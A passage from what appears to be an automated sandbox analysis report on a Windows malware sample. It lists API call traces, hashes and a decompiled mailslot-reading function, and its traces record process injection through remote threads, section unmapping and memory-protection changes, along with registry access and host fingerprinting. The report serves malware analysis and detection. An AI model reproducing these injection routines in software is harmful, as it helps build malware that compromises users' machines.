    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}


APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
